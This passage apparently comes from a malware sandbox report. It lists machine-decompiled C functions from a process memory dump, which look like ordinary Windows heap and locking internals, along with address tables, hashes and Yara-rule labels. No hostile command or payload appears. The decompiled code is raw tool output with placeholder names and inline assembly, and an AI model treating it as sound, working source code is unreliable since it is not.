								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E010BFFB0(_t42, _t53, 0x1198608);
							if(_t53 != 0) {
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E010BFFB0(_t41, _t51, 0x1198608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                          0x010e4a2c
                                          0x010e4a34
                                          0x010e4a3c
                                          0x010e4a3e
                                          0x010e4a48
                                          0x010e4a4b
                                          0x010e4a4d
                                          0x010e4a51
                                          0x010e4a9c
                                          0x00000000
                                          0x00000000
                                          0x010e4aa3
                                          0x010e4aa8
                                          0x010e4aad
                                          0x010e4ab1
                                          0x010e4ade
                                          0x010e4ae3
                                          0x010e4a5a
                                          0x010e4a62
                                          0x010e4a6a
                                          0x010e4a6e
                                          0x0111f203
                                          0x010e4a84
                                          0x010e4a88
                                          0x010e4a89
                                          0x010e4a8a
                                          0x010e4a95
                                          0x010e4a95
                                          0x010e4a79
                                          0x010e4a80
                                          0x010e4af2
                                          0x010e4af4
                                          0x010e4af9
                                          0x010e4aff
                                          0x010e4b01
                                          0x010e4b03
                                          0x010e4b08
                                          0x0111f20a
                                          0x0111f212
                                          0x0111f216
                                          0x0111f216
                                          0x010e4b08
                                          0x010e4b13
                                          0x010e4b1a
                                          0x0111f229
                                          0x0111f229
                                          0x010e4b1a
                                          0x010e4a82
                                          0x00000000
                                          0x010e4a82
                                          0x010e4ab7
                                          0x010e4acd
                                          0x010e4acd
                                          0x010e4ad5
                                          0x010e4ada
                                          0x00000000
                                          0x010e4ada
                                          0x010e4ac2
                                          0x010e4acb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010e4acb
                                          0x010e4a53
                                          0x010e4a53
                                          0x010e4a58
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d28487231180396aac35b9bbdb1756b93408905693353233ab2680eda4c0eaf7
                                          • Instruction ID: fda87b79bcfbe5b5d0519bccca650f10dbcfb3f67871114ef048167907fdbcc9
                                          • Opcode Fuzzy Hash: d28487231180396aac35b9bbdb1756b93408905693353233ab2680eda4c0eaf7
                                          • Instruction Fuzzy Hash: 123104322052129FCB659F5AC988B6AFBE5FF85B20F09056DE4A6CB641C770D805CBC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E8EC7 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E010E8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x119d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E010D4E70(0x11986e4, 0x10e9490, 0, 0);
					if( *0x11953e8 > 5 && E010E8F33(0x11953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x11953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x11953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x108bc46;
						_t48 = E01127B9C(0x11953e8, 0x108bc46, _t67, 0x11953e8, _t70,  &_v140);
					}
				}
				return E010EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                          0x010e8ec7
                                          0x010e8ed9
                                          0x010e8edc
                                          0x010e8ee6
                                          0x010e8ee9
                                          0x010e8eee
                                          0x010e8efc
                                          0x010e8f08
                                          0x01121349
                                          0x01121353
                                          0x0112135d
                                          0x01121366
                                          0x0112136f
                                          0x01121375
                                          0x0112137c
                                          0x01121385
                                          0x01121390
                                          0x01121391
                                          0x0112139c
                                          0x0112139d
                                          0x011213a6
                                          0x011213ac
                                          0x011213b2
                                          0x011213b5
                                          0x011213bc
                                          0x011213bf
                                          0x011213c2
                                          0x011213c5
                                          0x011213c8
                                          0x011213cb
                                          0x011213ce
                                          0x011213d1
                                          0x011213d4
                                          0x011213d7
                                          0x011213da
                                          0x011213dd
                                          0x011213e0
                                          0x011213e3
                                          0x011213e6
                                          0x011213e9
                                          0x011213f6
                                          0x01121400
                                          0x01121400
                                          0x010e8f08
                                          0x010e8f32

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e087c7596e8bb3c489c0d7013e8181ee7bdae36fb2aa3374aaa85507d777e4fc
                                          • Instruction ID: a879adf8d6188c64cca3ce3324936bff7d24c0465b94de4e9fba9f9982d9b24a
                                          • Opcode Fuzzy Hash: e087c7596e8bb3c489c0d7013e8181ee7bdae36fb2aa3374aaa85507d777e4fc
                                          • Instruction Fuzzy Hash: DE4190B1D002189FDB24CFAAD981AADFBF5FB48710F5081AEE559A7240D7705A84CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DE730 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E010DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E010E9670() < 0) {
					L010FDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1197b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L010C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M010DE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                          0x010de730
                                          0x010de736
                                          0x010de738
                                          0x010de73d
                                          0x010de73e
                                          0x010de740
                                          0x010de749
                                          0x010de765
                                          0x010de76a
                                          0x010de76b
                                          0x010de76c
                                          0x010de76d
                                          0x010de76e
                                          0x010de76f
                                          0x010de775
                                          0x010de777
                                          0x010de77e
                                          0x0111b675
                                          0x010de784
                                          0x010de784
                                          0x010de789
                                          0x010de7a8
                                          0x010de7ac
                                          0x010de807
                                          0x010de7ae
                                          0x010de7ae
                                          0x010de7b1
                                          0x010de7b4
                                          0x010de7b9
                                          0x010de7c0
                                          0x010de7c4
                                          0x010de7ca
                                          0x010de7cc
                                          0x00000000
                                          0x010de7d3
                                          0x010de7d6
                                          0x00000000
                                          0x00000000
                                          0x010de7ff
                                          0x010de802
                                          0x00000000
                                          0x00000000
                                          0x010de7f9
                                          0x010de7fc
                                          0x00000000
                                          0x00000000
                                          0x010de7f3
                                          0x010de7f6
                                          0x00000000
                                          0x00000000
                                          0x010de7ed
                                          0x010de7f0
                                          0x00000000
                                          0x00000000
                                          0x010de7e7
                                          0x010de7ea
                                          0x00000000
                                          0x00000000
                                          0x0111b685
                                          0x0111b688
                                          0x00000000
                                          0x00000000
                                          0x0111b682
                                          0x00000000
                                          0x00000000
                                          0x010de7cc
                                          0x010de7d9
                                          0x010de7dc
                                          0x010de7de
                                          0x010de7de
                                          0x010de7ac
                                          0x010de7e4
                                          0x010de74b
                                          0x010de751
                                          0x010de759
                                          0x010de761
                                          0x010de761

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe60b73635cdb75565e682d331e67160683e6809ef75255c639a5d925e70b865
                                          • Instruction ID: 0cb20c3ef09c6f0e4194bc07ef5fe00117b2fe5319644fed707311181555b2e9
                                          • Opcode Fuzzy Hash: fe60b73635cdb75565e682d331e67160683e6809ef75255c639a5d925e70b865
                                          • Instruction Fuzzy Hash: F4315C75A14249EFD744CF58D841B9ABBE4FB09214F1582AAFA58CB341D631E980CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DBC2C Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E010DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1196100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E010C2280(0xd, 0x57ef1a0);
				_t41 =  *0x11960f8; // 0x0
				if(_t41 != 0) {
					 *0x11960f8 =  *_t41;
					 *0x11960fc =  *0x11960fc + 0xffff;
				}
				E010BFFB0(_t41, 0x800, 0x57ef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x11960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L010C4620(0x1196100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1196100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                          0x010dbc36
                                          0x010dbc42
                                          0x010dbc45
                                          0x010dbc4a
                                          0x010dbd35
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010dbc50
                                          0x010dbc50
                                          0x010dbc58
                                          0x010dbc5a
                                          0x010dbc60
                                          0x00000000
                                          0x00000000
                                          0x0111a4f2
                                          0x0111a4f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111a4fc
                                          0x010dbc79
                                          0x010dbc7e
                                          0x010dbc86
                                          0x010dbd16
                                          0x010dbd20
                                          0x010dbd20
                                          0x010dbc8d
                                          0x010dbc94
                                          0x010dbcbd
                                          0x010dbcca
                                          0x010dbccb
                                          0x010dbccc
                                          0x010dbccd
                                          0x010dbcce
                                          0x010dbcd4
                                          0x010dbcea
                                          0x010dbcee
                                          0x010dbcf2
                                          0x010dbd00
                                          0x010dbd04
                                          0x00000000
                                          0x010dbc96
                                          0x010dbcab
                                          0x010dbcaf
                                          0x010dbd2c
                                          0x010dbd2c
                                          0x010dbd09
                                          0x00000000
                                          0x010dbd09
                                          0x010dbcb1
                                          0x010dbcb5
                                          0x010dbcbb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010dbcbb

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c0b9fab41a93d049660ca1e488f86230b11e4218f63be80b5ce661d3cc8ad8
                                          • Instruction ID: e043be223487cc28c37d7d132e83b1b1175a75ceaa10493db9777418a9074be1
                                          • Opcode Fuzzy Hash: 14c0b9fab41a93d049660ca1e488f86230b11e4218f63be80b5ce661d3cc8ad8
                                          • Instruction Fuzzy Hash: 83312272A007069BCB21EF58C4C07AA77B4FF19310F0A4079EDA4DB20AEB74D945CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A9100 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E010A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x117f6e8);
				E010FD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E011788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E010FD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x11986c0; // 0xb507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x11986b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E010C2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E011788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E010EAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x119b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x11984c0;
										if(_t69 >=  *0x11984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01179063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E010A922A(_t82);
							_t53 = E010C7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01178B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x11986c0; // 0xb507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x11986b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x11986bc;
										_t72 = 0x11986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E010A9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x11986c4;
									_t72 = 0x11986c0;
									L18:
									E010D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                          0x010a9100
                                          0x010a9100
                                          0x010a9100
                                          0x010a9100
                                          0x010a9102
                                          0x010a9107
                                          0x010a910c
                                          0x010a9110
                                          0x010a9115
                                          0x010a9136
                                          0x010a9143
                                          0x011037e4
                                          0x011037e4
                                          0x010a9149
                                          0x010a914e
                                          0x010a914e
                                          0x010a9117
                                          0x010a911d
                                          0x00000000
                                          0x00000000
                                          0x010a911f
                                          0x010a9125
                                          0x00000000
                                          0x010a9151
                                          0x010a9158
                                          0x010a915d
                                          0x010a9161
                                          0x010a9168
                                          0x01103715
                                          0x00000000
                                          0x010a916e
                                          0x010a916e
                                          0x010a9175
                                          0x010a9177
                                          0x010a917e
                                          0x010a917f
                                          0x010a9182
                                          0x010a9182
                                          0x010a9187
                                          0x010a9187
                                          0x010a918a
                                          0x010a918d
                                          0x010a918f
                                          0x010a9192
                                          0x010a9195
                                          0x010a9198
                                          0x010a9198
                                          0x010a9198
                                          0x010a919a
                                          0x00000000
                                          0x00000000
                                          0x0110371f
                                          0x01103721
                                          0x01103727
                                          0x0110372f
                                          0x01103733
                                          0x01103735
                                          0x01103738
                                          0x0110373b
                                          0x0110373d
                                          0x01103740
                                          0x00000000
                                          0x00000000
                                          0x01103746
                                          0x01103749
                                          0x00000000
                                          0x00000000
                                          0x0110374f
                                          0x01103751
                                          0x00000000
                                          0x00000000
                                          0x01103757
                                          0x01103759
                                          0x0110375c
                                          0x0110375c
                                          0x0110375e
                                          0x0110375e
                                          0x01103761
                                          0x01103764
                                          0x00000000
                                          0x00000000
                                          0x01103766
                                          0x01103768
                                          0x011037a3
                                          0x011037a3
                                          0x011037a5
                                          0x011037a7
                                          0x011037ad
                                          0x011037b0
                                          0x011037b2
                                          0x011037bc
                                          0x011037c2
                                          0x011037c2
                                          0x011037b2
                                          0x010a9187
                                          0x010a9187
                                          0x010a918a
                                          0x010a918d
                                          0x010a918f
                                          0x010a9192
                                          0x010a9195
                                          0x00000000
                                          0x010a9195
                                          0x00000000
                                          0x010a9187
                                          0x0110376a
                                          0x0110376a
                                          0x0110376c
                                          0x0110376c
                                          0x0110376f
                                          0x01103775
                                          0x00000000
                                          0x00000000
                                          0x01103777
                                          0x01103779
                                          0x00000000
                                          0x00000000
                                          0x01103782
                                          0x01103787
                                          0x01103789
                                          0x01103790
                                          0x01103790
                                          0x0110378b
                                          0x0110378b
                                          0x0110378b
                                          0x01103792
                                          0x01103795
                                          0x01103795
                                          0x01103798
                                          0x01103798
                                          0x0110379b
                                          0x0110379b
                                          0x010a91a3
                                          0x010a91a9
                                          0x010a91b0
                                          0x010a91b4
                                          0x010a91b4
                                          0x010a91bb
                                          0x010a91c0
                                          0x010a91c5
                                          0x010a91c7
                                          0x011037da
                                          0x010a91cd
                                          0x010a91cd
                                          0x010a91cd
                                          0x010a91d2
                                          0x010a91d5
                                          0x010a9239
                                          0x010a9239
                                          0x010a91d7
                                          0x010a91db
                                          0x010a91e1
                                          0x010a91e7
                                          0x010a91fd
                                          0x010a9203
                                          0x010a921e
                                          0x010a9223
                                          0x00000000
                                          0x010a9223
                                          0x010a9205
                                          0x010a9208
                                          0x010a920c
                                          0x010a9214
                                          0x010a9214
                                          0x010a91e9
                                          0x010a91e9
                                          0x010a91ee
                                          0x010a91f3
                                          0x010a91f3
                                          0x010a91f3
                                          0x010a91e7
                                          0x00000000
                                          0x010a91db
                                          0x010a9187
                                          0x010a9168

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e41255a78d1a3fcdeb9f69062a55f463415b51f5ff68631e89c43c54c40cf57d
                                          • Instruction ID: 005246a8217e0249a920fdfb6d1d1da8ebb751805baf384a7579b05bc689f6dd
                                          • Opcode Fuzzy Hash: e41255a78d1a3fcdeb9f69062a55f463415b51f5ff68631e89c43c54c40cf57d
                                          • Instruction Fuzzy Hash: B631D471B01645DFDB6ADFACC088BADBBF1BB49318F94819DC5946B241C374B980CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D1DB5 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E010D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E010CF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L010C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E010CF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                          0x010d1dc2
                                          0x010d1dc5
                                          0x010d1dc7
                                          0x010d1dcc
                                          0x010d1dce
                                          0x010d1dd6
                                          0x010d1ddf
                                          0x010d1de0
                                          0x010d1de1
                                          0x010d1de5
                                          0x010d1de8
                                          0x010d1def
                                          0x010d1df0
                                          0x010d1df6
                                          0x010d1df7
                                          0x010d1dfe
                                          0x010d1e1a
                                          0x00000000
                                          0x00000000
                                          0x010d1e0b
                                          0x010d1e12
                                          0x010d1e12
                                          0x010d1e00
                                          0x010d1e00
                                          0x010d1e05
                                          0x010d1e1e
                                          0x010d1e23
                                          0x0111570f
                                          0x01115713
                                          0x00000000
                                          0x00000000
                                          0x01115719
                                          0x01115719
                                          0x010d1e2c
                                          0x010d1e2d
                                          0x010d1e2e
                                          0x010d1e2f
                                          0x010d1e31
                                          0x010d1e32
                                          0x010d1e35
                                          0x010d1e3d
                                          0x01115723
                                          0x0111573d
                                          0x0111573d
                                          0x00000000
                                          0x01115723
                                          0x010d1e49
                                          0x010d1e4e
                                          0x010d1e4e
                                          0x010d1e09
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: e64e88fc0829e52d23a91a36ca4c69988dfbd60a7f198ae9d43a5a4ab99463b6
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
